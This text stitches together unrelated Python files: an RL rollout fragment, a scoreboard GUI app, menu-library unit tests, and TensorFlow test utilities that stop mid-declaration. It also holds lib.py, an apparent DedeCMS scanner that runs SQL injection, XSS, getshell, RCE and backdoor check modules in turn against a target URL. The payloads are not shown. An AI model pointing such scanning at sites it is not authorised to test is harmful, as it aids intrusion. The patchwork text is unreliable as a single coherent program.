mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward = \
map(swap_and_flatten, (mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, true_reward))
# reset data
self.mb_obs = [[] for _ in range(self.n_envs)]
self.mb_actions = [[] for _ in range(self.n_envs)]
self.mb_values = [[] for _ in range(self.n_envs)]
self.mb_neglogpacs = [[] for _ in range(self.n_envs)]
self.mb_dones = [[] for _ in range(self.n_envs)]
self.mb_rewards = [[] for _ in range(self.n_envs)]
self.scores = [[] for _ in range(self.n_envs)]
return mb_obs, mb_returns, mb_dones, mb_actions, mb_values, mb_neglogpacs, mb_states, ep_infos, true_reward
|
lib.py
|
from termcolor import cprint
import threading
from info.GetVersion import GetVersion
from info.FindAdmin import FindAdmin
from info.trace import trace
from info.shortpath import shortpath
from info.passwordrest import passwordres
from info.path import path
from script.advancedsearch_sqli import advancedsearch_sqli
from script.dedesql_class_sqli import dedesql_class_sqli
from script.feedback_js_sqli import feedback_sqli
from script.getpage_xss import getpage_xss
from script.guestbook_sqli import guestbook_sqli
from script.infosearch_sqli import infosearch_sqli
from script.jump_xss import jump_xss
from script.mem_login_xss import jump_xss as mem_login_xss  # aliased so it does not shadow jump_xss imported above
from script.recommend_sqli import recomsqli
from script.redirect import redirect
from script.reg_new_sqli import reg_new_sqli
from script.search_sqli import search_sqli
from script.V5orderby import V5orderby
from script.v5xarticlekeywordsselectxss import article_xss
from script.v5xcatalogtreexss import catalogtree_xss
from script.v5xcontentlistxss import content_list_xss
from script.v5xfilepicview import file_pic_vie_xss
from script.v5xpicviewxss import pic_view_xss
from script.v5xselectimages import select_images_xss
from script.v51WriteBookTextgetshell import writebook_getshell
from script.v53diggframerce import dig_frame_rce
from script.v55finalgetshell import final_getshell
from script.v55keywordxss import keyword_xss
from script.v56gourlxss import gourl_xss
from script.v57adminxss import config_xss
from script.v57backdoor import backdoor
from script.v57flashxss import flash_xss
class check:
def __init__(self,url):
self.url = url
def poc(self):
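        # Run every check in sequence: each check runs on a short-lived worker thread that is
        # joined immediately, so the overall scan is effectively sequential.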
url = self.url
cprint("Version checking in progress","magenta")
dd = GetVersion(url=url)
        t = threading.Thread(target=dd.version)
t.setDaemon(True)
t.start()
t.join()
cprint("find admin in progress","magenta")
dd = FindAdmin(url=url)
        t = threading.Thread(target=dd.findadmin)
t.setDaemon(True)
t.start()
t.join()
cprint("trace checking in progress","magenta")
dd = trace(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("shortpath checking in progress","magenta")
dd = shortpath(url=url)
        t = threading.Thread(target=dd.shortpath)
t.setDaemon(True)
t.start()
t.join()
cprint("password reset checking in progress","magenta")
dd = passwordres(url=url)
        t = threading.Thread(target=dd.checkpass)
t.setDaemon(True)
t.start()
t.join()
cprint("path checking in progress","magenta")
dd = path(url=url)
        t = threading.Thread(target=dd.checkpath)
t.setDaemon(True)
t.start()
t.join()
cprint("advancedsearch_sqli checking in progress","magenta")
dd = advancedsearch_sqli(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("dedesql_class_sqli checking in progress","magenta")
dd = dedesql_class_sqli(url=url)
        t = threading.Thread(target=dd.checkdedesql)
t.setDaemon(True)
t.start()
t.join()
cprint("feedback_js_sqli checking in progress","magenta")
dd = feedback_sqli(url=url)
        t = threading.Thread(target=dd.feedcheck)
t.setDaemon(True)
t.start()
t.join()
cprint("getpage_xss checking in progress","magenta")
dd = getpage_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("guestbook_sqli checking in progress","magenta")
dd = guestbook_sqli(url=url)
        t = threading.Thread(target=dd.checksql)
t.setDaemon(True)
t.start()
t.join()
cprint("infosearch_sqli checking in progress","magenta")
dd = infosearch_sqli(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("jump_xss checking in progress","magenta")
dd = jump_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("recommend_sqli checking in progress","magenta")
dd = recomsqli(url=url)
        t = threading.Thread(target=dd.checksql)
t.setDaemon(True)
t.start()
t.join()
cprint("redirect checking in progress","magenta")
dd = redirect(url=url)
        t = threading.Thread(target=dd.check_redirect)
t.setDaemon(True)
t.start()
t.join()
cprint("reg_new_sqli checking in progress","magenta")
dd = reg_new_sqli(url=url)
        t = threading.Thread(target=dd.checksql)
t.setDaemon(True)
t.start()
t.join()
cprint("search_sqli checking in progress","magenta")
dd = search_sqli(url=url)
        t = threading.Thread(target=dd.checksqli)
t.setDaemon(True)
t.start()
t.join()
cprint("V5orderby checking in progress","magenta")
dd = V5orderby(url=url)
        t = threading.Thread(target=dd.checksql)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xarticlekeywordsselectxss checking in progress","magenta")
dd = article_xss(url=url)
        t = threading.Thread(target=dd.checktxss)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xcatalogtreexss checking in progress","magenta")
dd = catalogtree_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xcontentlistxss checking in progress","magenta")
dd = content_list_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xfilepicview checking in progress","magenta")
dd = file_pic_vie_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xpicviewxss checking in progress","magenta")
dd = pic_view_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v5xselectimages checking in progress","magenta")
dd = select_images_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v51WriteBookTextgetshell checking in progress","magenta")
dd = writebook_getshell(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v53diggframerce checking in progress","magenta")
dd = dig_frame_rce(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v55finalgetshell checking in progress","magenta")
dd = final_getshell(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v55keywordxss checking in progress","magenta")
dd = keyword_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v56gourlxss checking in progress","magenta")
dd = gourl_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v57adminxss checking in progress","magenta")
dd = config_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v57backdoor checking in progress","magenta")
dd = backdoor(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
cprint("v57flashxss checking in progress","magenta")
dd = flash_xss(url=url)
        t = threading.Thread(target=dd.checktrace)
t.setDaemon(True)
t.start()
t.join()
|
SCOREBOARD_WITH_SETTING_PAGE.py
|
# This is my first app done using REMI and Python. There is probably a better way to do it.
# This app is a simple scoreboard. I use it when I play pool/billiards.
# In the app it is possible to set up how many games a player has to win in order to win a match.
# Example: the program starts with 5 games needed to win a match. The background color of each player's window is normally green; when a player
# reaches 4 games won, his background becomes orange (a sign that he needs only one more game to win the match). When he reaches 5, his background
# becomes red for 3 seconds and then goes back to green, the games score goes back to 0, and his "matches won" count increases by one.
import remi.gui as gui
from remi import start, App
import os
import time
import threading
class MyApp(App):
    # I modified the original CSS file adding a "Button:hover" property and other color schemes; the main configuration of the program has been done directly in the code.
    # Put the new CSS file in a /res folder next to this script.
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
super(MyApp, self).__init__(*args, static_file_path={'res':res_path})
def idle(self):
pass
    # This is the function called as a new thread: it updates the number displayed, changes the background color to red for 3 seconds, resets the game variables,
    # and changes the background color back to green.
def ChangeColor(self, Text, Side, Num, BtUp, BtDn):
self.In = 1
with self.update_lock:
Text.set_text(str(Num))
Side.style['background-color'] = 'red'
BtUp.attributes['class']='up80red'
BtDn.attributes['class']='dn80red'
        time.sleep(3) # I tried to make this function work without a thread, but sleeping here froze the interface update and I wasn't able to change
        # the background to red. The Remi developers helped me solve this.
with self.update_lock:
Side.style['background-color'] = 'green'
BtUp.attributes['class']='up80'
BtDn.attributes['class']='dn80'
self.LeftNum = 0
self.RightNum = 0
self.In = 0
self.check_score()
def main(self):
self.In = 0 # Used to disable all buttons when in thread function, otherwise strange things happen if you press a button when the app is in the thread
self.LeftNum = 0 # Left player game won
self.RightNum = 0 # Right player game won
self.MatchNum = 5 # Number of game to win for each match
self.LeftMatchNum = 0 # Left player match won
self.RightMatchNum = 0 # Right player match won
self.Name1 = 'LEFT' # Name left player
self.Name2 = 'RIGHT' # Name right player
# Main container configuration page
widMenu = gui.Widget(width=480, height=610, layout_orientation=gui.Widget.LAYOUT_VERTICAL, style={'margin':'0px auto', 'background':'black'})
# Configuration menu
self.lblMenu = gui.Label('SCOREBOARD', width='100%', height='45px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'40px', 'font-weight':'bold', 'color':'green', 'line-height':'45px', 'text-align':'center'})
self.lblMenu2 = gui.Label('Setup players name:', width='100%', height='45px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'30px', 'font-weight':'bold', 'line-height':'45px', 'text-align':'left'})
self.lblName1 = gui.Label('PLAYER 1 NAME:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
self.txtName1 = gui.TextInput(width='96%', height='35px', style={'margin':'0px auto', 'padding-top':'20px', 'padding-left':'5px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
self.txtName1.set_text('P1')
self.lblName2 = gui.Label('PLAYER 2 NAME:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
self.txtName2 = gui.TextInput(width='96%', height='35px', style={'margin':'0px auto', 'padding-top':'20px', 'padding-left':'5px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
self.txtName2.set_text('P2')
## self.lblMatchSet = gui.Label('RACE TO:', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'20px', 'line-height':'25px', 'text-align':'left'})
## self.txtMatchSet = gui.TextInput(width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'20px', 'font-size':'30px', 'line-height':'20px', 'text-align':'left', 'border':'1px solid white', 'background':'black'})
## self.txtMatchSet.set_text('5')
# Start button
btMenu = gui.Button('START', width='40%', height='40px', style={'margin':'50px 20% 20px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
## widMenu.append([self.lblMenu, self.lblMenu2, self.lblName1, self.txtName1, self.lblName2, self.txtName2, self.lblMatchSet, self.txtMatchSet, btMenu])
widMenu.append([self.lblMenu, self.lblMenu2, self.lblName1, self.txtName1, self.lblName2, self.txtName2, btMenu])
# Buttons function call
btMenu.onclick.connect(self.on_button_pressed_menu)
# Main container scoreboard page
wid = gui.Widget(width=480, height=610, style={'margin':'0px auto', 'background':'black'})
# Title
self.lbl = gui.Label('SCOREBOARD', width='100%', height='35px', style={'margin':'0px 0px 0px', 'padding-top':'10px', 'font-size':'30px', 'line-height':'35px', 'text-align':'center'})
# Containers for games counters
# Horizontal container
wid1 = gui.Widget(width='100%', height=600, layout_orientation=gui.Widget.LAYOUT_HORIZONTAL, style={'background':'black'})
# Container for left side
self.wid2 = gui.Widget(width=230, height=350, margin='5px', style={'background':'green'})
# Container for right side
self.wid3 = gui.Widget(width=230, height=350, margin='5px', style={'background':'green'})
# Left side interface
self.lblLeftName = gui.Label(self.Name1, width='95%', height='60px', style={'margin':'20px 2px 0px', 'font-size':'40px', 'line-height':'60px', 'text-align':'center', 'overflow':'hidden'})
self.lblLeftNum = gui.Label(str(self.LeftNum), width='100%', height='130px', style={'margin':'0px 0px 10px', 'font-size':'140px', 'line-height':'130px', 'text-align':'center'})
self.btLeftPlus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btLeftPlus.attributes['class']='up80'
self.btLeftMinus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btLeftMinus.attributes['class']='dn80'
lblLeftMatch = gui.Label('MATCHES WON:', width=150, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
self.lblLeftMatches = gui.Label(str(self.LeftMatchNum), width=30, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
# Right side interface
self.lblRightName = gui.Label(self.Name2, width='95%', height='60px', style={'margin':'20px 2px 0px', 'font-size':'40px', 'line-height':'60px', 'text-align':'center', 'overflow':'hidden'})
        self.lblRightNum = gui.Label(str(self.RightNum), width='100%', height='130px', style={'margin':'0px 0px 10px', 'font-size':'140px', 'line-height':'130px', 'text-align':'center'})
self.btRightPlus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btRightPlus.attributes['class']='up80'
self.btRightMinus = gui.Button('', width='80px', height='80px', style={'margin':'0px 10px 20px', 'font-size':'50px', 'line-height':'50px', 'text-align':'center'})
self.btRightMinus.attributes['class']='dn80'
lblRightMatch = gui.Label('MATCHES WON:', width=150, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
self.lblRightMatches = gui.Label(str(self.RightMatchNum), width=30, height='30px', style={'margin':'0px 5px', 'font-size':'20px', 'line-height':'30px', 'text-align':'left', 'display':'inline'})
# Appends all the widgets to create the interface
self.wid2.append([self.lblLeftName, self.lblLeftNum, self.btLeftPlus, self.btLeftMinus, lblLeftMatch, self.lblLeftMatches])
self.wid3.append([self.lblRightName, self.lblRightNum, self.btRightPlus, self.btRightMinus, lblRightMatch, self.lblRightMatches])
wid1.append(self.wid2)
wid1.append(self.wid3)
# Extra labels and button to manage:
# The number of games to win, to win a match
lblMatch = gui.Label('GAMES FOR MATCH:', width='50%', height='50px', style={'margin':'15px 2px 0px 10px', 'font-size':'25px', 'line-height':'35px', 'text-align':'center'})
self.lblMatches = gui.Label(str(self.MatchNum), width='8%', height='50px', style={'margin':'15px 2px 0px', 'font-size':'25px', 'line-height':'35px', 'text-align':'center'})
btMatchPlus = gui.Button('', width='50px', height='50px', style={'margin':'5px 2px 0px 20px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
btMatchPlus.attributes['class']='up50'
btMatchMinus = gui.Button('', width='50px', height='50px', style={'margin':'5px 2px', 'font-size':'30px', 'line-height':'30px', 'text-align':'center'})
btMatchMinus.attributes['class']='dn50'
wid1.append([lblMatch, btMatchPlus, self.lblMatches, btMatchMinus])
# Reset buttons for Score and Matches won
btReset = gui.Button('RESET SCORE', width='50%', height='35px', style={'margin':'10px 25% 10px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btReset)
btResetMatch = gui.Button('RESET MATCH', width='50%', height='35px', style={'margin':'10px 25% 10px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btResetMatch)
btSetting = gui.Button('SETTINGS', width='50%', height='35px', style={'margin':'10px 25% 20px', 'font-size':'25px', 'line-height':'30px', 'text-align':'center'})
wid1.append(btSetting)
# Buttons function call
# 'LT', 'RT', 'PLUS', 'MINUS' are used to identify the button pressed; in this way I created a single function for Left and Right buttons.
self.btLeftPlus.onclick.connect(self.on_button_pressed_plus, 'LT')
self.btLeftMinus.onclick.connect(self.on_button_pressed_minus, 'LT')
self.btRightPlus.onclick.connect(self.on_button_pressed_plus, 'RT')
self.btRightMinus.onclick.connect(self.on_button_pressed_minus, 'RT')
btMatchPlus.onclick.connect(self.on_button_pressed_match, 'PLUS')
btMatchMinus.onclick.connect(self.on_button_pressed_match, 'MINUS')
btReset.onclick.connect(self.on_button_pressed_reset)
btResetMatch.onclick.connect(self.on_button_pressed_reset_match)
btSetting.onclick.connect(self.on_button_setting)
        # Append the title and the interface to the main container
wid.append(self.lbl)
wid.append(wid1)
self.wid = wid
self.widMenu = widMenu
# Returning the configuration page
return self.widMenu
#Used to change the size of the font based on the number of characters of the name
@staticmethod
def name_length(Name):
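        # Worked examples: name_length('Bob') -> ('Bob', 40); name_length('Jonathan') -> ('Jonathan', 30);
        # name_length('A very long player name') -> ('A very long pl', 22), i.e. cut to 14 characters.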
if len(Name) <= 6:
return (Name, 40)
elif len(Name) <= 8:
return (Name, 30)
elif len(Name) <= 10:
return (Name, 22)
else:
Name = Name[:14] #always cuts the name at 14 characters
return (Name, 22)
    # Used to copy the names typed in the settings page into the scoreboard and to activate the main widget
def on_button_pressed_menu(self, emitter):
# left name
Name = self.txtName1.get_text()
Name, FntSize = MyApp.name_length(Name)
FntSize = str(FntSize) + "px"
self.lblLeftName.style['font-size'] = FntSize
self.lblLeftName.set_text(Name)
# right name
Name = self.txtName2.get_text()
Name, FntSize = MyApp.name_length(Name)
FntSize = str(FntSize) + "px"
self.lblRightName.style['font-size'] = FntSize
self.lblRightName.set_text(Name)
## self.lblMatches.set_text(self.txtMatchSet.get_text())
## self.MatchNum = int(self.txtMatchSet.get_text())
self.set_root_widget(self.wid)
#Used to activate the setting widget
def on_button_setting(self, emitter):
self.set_root_widget(self.widMenu)
def check_score(self):
# Here the software update automatically any number you can see in the app
if (self.LeftNum < self.MatchNum) and (self.RightNum < self.MatchNum):
self.lblLeftNum.set_text(str(self.LeftNum))
self.lblRightNum.set_text(str(self.RightNum))
self.lblLeftMatches.set_text(str(self.LeftMatchNum))
self.lblRightMatches.set_text(str(self.RightMatchNum))
self.lblMatches.set_text(str(self.MatchNum))
        # Here the software checks whether a background needs to be green or orange.
if (self.LeftNum < self.MatchNum - 1):
self.wid2.style['background-color'] = 'green'
self.btLeftPlus.attributes['class']='up80'
self.btLeftMinus.attributes['class']='dn80'
if (self.RightNum < self.MatchNum - 1):
self.wid3.style['background-color'] = 'green'
self.btRightPlus.attributes['class']='up80'
self.btRightMinus.attributes['class']='dn80'
if (self.LeftNum == self.MatchNum - 1):
self.wid2.style['background-color'] = 'orange'
self.btLeftPlus.attributes['class']='up80org'
self.btLeftMinus.attributes['class']='dn80org'
if (self.RightNum == self.MatchNum - 1):
self.wid3.style['background-color'] = 'orange'
self.btRightPlus.attributes['class']='up80org'
self.btRightMinus.attributes['class']='dn80org'
        # When one of the players wins the match, a thread is started to temporarily turn the background red and then move it back to green.
        # The thread is required so that it does not stop the automatic update of the graphics in the app.
        # The app passes to the thread these parameters: lblLeftNum (the text field that shows the number in the app), the widget that holds that side of the interface,
        # LeftNum (the variable that counts the games won by the left player), plus the two buttons. The right side works the same way, with "Right" in the variable names :-).
# Left side
if (self.LeftNum >= self.MatchNum):
Side = [self.lblLeftNum, self.wid2, self.LeftNum, self.btLeftPlus, self.btLeftMinus]
t = threading.Thread(target=self.ChangeColor, args = (Side))
t.start()
self.LeftMatchNum = self.LeftMatchNum + 1
# Right side
elif (self.RightNum >= self.MatchNum):
Side = [self.lblRightNum, self.wid3, self.RightNum, self.btRightPlus, self.btRightMinus]
t = threading.Thread(target=self.ChangeColor, args = (Side))
t.start()
self.RightMatchNum = self.RightMatchNum + 1
    # Each function uses the Side parameter to identify which button called it and consequently what to update (maybe there is a better way to manage this).
# Increase the number of the games won
def on_button_pressed_plus(self, emitter, Side):
if not self.In:
if Side == 'LT':
if self.LeftNum < self.MatchNum:
self.LeftNum = self.LeftNum + 1
elif Side == 'RT':
if self.RightNum < self.MatchNum:
self.RightNum = self.RightNum + 1
self.check_score()
# Decrease the number of the games won
def on_button_pressed_minus(self, emitter, Side):
if not self.In:
if Side == 'LT':
if self.LeftNum != 0:
self.LeftNum = self.LeftNum - 1
elif Side == 'RT':
if self.RightNum != 0:
self.RightNum = self.RightNum - 1
self.check_score()
# Increase or decrease the Matches number
def on_button_pressed_match(self, emitter, Side):
if not self.In:
if Side == 'PLUS':
self.MatchNum = self.MatchNum + 1
elif Side == 'MINUS':
                # When the user decreases the number of games needed to win a match, and this becomes lower than the games already won by a player,
                # the number of games won decreases too. This way the games won can never be bigger than the number of games needed to win the match.
                # Try this in the app to better understand: with the match set to five, increase one player's games won to three, then go down
                # with the Matches button to 1 and see what happens.
if self.MatchNum > 1:
if self.MatchNum - 1 <= self.LeftNum:
self.LeftNum = self.LeftNum - 1
if self.MatchNum - 1 <= self.RightNum:
self.RightNum = self.RightNum - 1
self.MatchNum = self.MatchNum - 1
self.check_score()
def on_button_pressed_reset(self, emitter):
if not self.In:
self.LeftNum = 0
self.RightNum = 0
self.check_score()
def on_button_pressed_reset_match(self, emitter):
if not self.In:
self.LeftMatchNum = 0
self.RightMatchNum = 0
self.check_score()
if __name__ == "__main__":
# starts the webserver
# optional parameters
start(MyApp,address='', port=8081, multiple_instance=False,enable_file_cache=True, update_interval=0.1, start_browser=True)
# start(MyApp, debug=True)
|
tests.py
|
import unittest
import threading
from src.FiniteConsole.FiniteConsole import Program, Menu, Option
from src.FiniteConsole import ProgramExistsException, MenuExistsException, UndeterminedOption
class TestProgram(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
Menu.TEST = True
def tearDown(self) -> None:
self.p.drop()
def test_singleton(self):
self.assertEqual(Program.get_program(), self.p)
try:
            self.assertRaises(ProgramExistsException, Program)
except ProgramExistsException:
pass
self.assertEqual(Program.get_program(), self.p)
def test_dependencies_resolver(self):
p = self.p
def func():
pass
empty_menu = Menu('empty')
self.assertIn('no options', p.resolve_dependencies())
empty_menu.action = func
self.assertNotIn('no options', p.resolve_dependencies())
self.assertIn('The initial', p.resolve_dependencies())
p.init_menu = empty_menu
self.assertNotIn('The initial', p.resolve_dependencies())
Menu('main').append_options(Option(1, 'a'))
Menu('a', func)
self.assertFalse(p.resolve_dependencies())
def test_loop(self):
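        # The loop should exit immediately while the program is unconfigured; once an initial menu
        # and options exist, start it on a background thread, wait until it reports running, then
        # stop it.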
p = self.p
self.assertFalse(p._is_running)
        t = threading.Thread(target=p.start_loop)
t.start()
t.join()
self.assertFalse(p._is_running)
p.init_menu = Menu('main')
p.init_menu.append_options(Option(1, 'A', 'Go to A'), Option(2, 'B', 'Go to B'))
Menu('A', lambda x: x*x)
Menu('B', lambda x: x*x)
def for_lambda():
yield 5
p.args.append(next(for_lambda()))
t = threading.Thread(target=p.start_loop)
t.start()
while not p._is_running:
pass
p.stop_loop()
def test_mapping(self):
p = self.p
p.init_menu = Menu('main').append_options(Option(1, 'inner', 'Go to inner'))
Menu('inner').append_options(Option(1, 'main', 'Go back'))
self.assertFalse(p.resolve_dependencies())
self.assertEqual(p._current_menu, p.menus['main'])
p._do_mapping(1)
self.assertEqual(p._current_menu, p.menus['inner'])
p._do_mapping(1)
self.assertEqual(p._current_menu, p.menus['main'])
class TestMenu(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
def tearDown(self) -> None:
self.p.drop()
def test_registration(self):
p = self.p
self.assertFalse(p.menus)
menus = [Menu('main'), Menu('exit')]
self.assertEqual(len(menus), len(p.menus))
try:
            self.assertRaises(MenuExistsException, Menu, 'main')
except MenuExistsException:
pass
self.assertEqual(len(menus), len(p.menus))
for menu in menus:
id_ = menu.id
self.assertIn(id_, p.menus)
self.assertIn(menu, p.menus.values())
self.assertEqual(menu, p.menus.get(id_))
        for menu, length in zip(menus, range(len(menus) - 1, -1, -1)):
            menu.remove()
            self.assertEqual(length, len(p.menus))
def test_finite_state(self):
main = Menu('main')
self.assertFalse(main.is_finite)
self.assertIsNone(main.action)
alg1 = Menu('counter', lambda x: x*x)
self.assertTrue(alg1.is_finite)
self.assertTrue(callable(alg1.action))
def test_options_management(self):
menu = Menu('main')
self.assertFalse(menu.options)
opt = Option(1, 'unpinned')
menu.append_options(opt)
self.assertEqual(1, len(menu.options))
self.assertEqual(opt, menu.options.get('1'))
menu.options.clear()
options = [Option(1, 'one'), Option(2, 'two'), Option(3, 'three')]
menu.append_options(*options)
for opt in options:
inp = opt.inp
self.assertEqual(opt, menu.options.get(inp))
self.assertEqual(len(options), len(menu.options))
for opt in options:
menu.remove_options(opt)
self.assertTrue(menu.options.get(opt.inp, True))
self.assertEqual(0, len(menu.options))
menu.append_options(*options)
for opt in options:
menu.remove_options(opt.inp)
self.assertTrue(menu.options.get(opt.inp, True))
self.assertEqual(0, len(menu.options))
def test_remove(self):
p = self.p
menus = [Menu('1'), Menu('2'), Menu('3'), Menu(4)]
for menu in menus:
self.assertIn(menu, p.menus.values())
menu.remove()
self.assertNotIn(menu, p.menus.values())
def test_undetermined_options(self):
menu = Menu(1).append_options(Option(1, 'repeated'))
options = [Option(1, 'a'), Option(1, 'b'), Option(1, 'c')]
for opt in options:
try:
                self.assertRaises(UndeterminedOption, menu.append_options, opt)
except UndeterminedOption:
pass
class TestOption(unittest.TestCase):
def setUp(self) -> None:
self.p = Program()
def tearDown(self) -> None:
self.p.drop()
def test_type_binding(self):
main = Menu('main')
exit_ = Menu('exit')
try:
            self.assertRaises(AttributeError, Option, None, None)
except AttributeError:
pass
opt = Option(1, 'main')
self.assertEqual(opt.out, main)
opt = Option(1, 'exit')
self.assertEqual(opt.out, exit_)
opt = Option(1, main)
self.assertEqual(opt.out, main)
opt = Option(1, exit_)
self.assertEqual(opt.out, exit_)
if __name__ == '__main__':
unittest.main()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
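# Example (illustrative sketch, not part of the original module): building a
# small graph and checking its ops with assert_ops_in_graph. The node names
# "x" and "y" are arbitrary choices for this example.
def _example_assert_ops_in_graph():
  g = ops.Graph()
  with g.as_default():
    x = array_ops.placeholder(dtypes.float32, name="x")
    array_ops.identity(x, name="y")
  # Maps node name -> expected op type; raises ValueError on any mismatch.
  return assert_ops_in_graph({"x": "Placeholder", "y": "Identity"}, g)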
@tf_export("test.assert_equal_graph_def", v1=[])
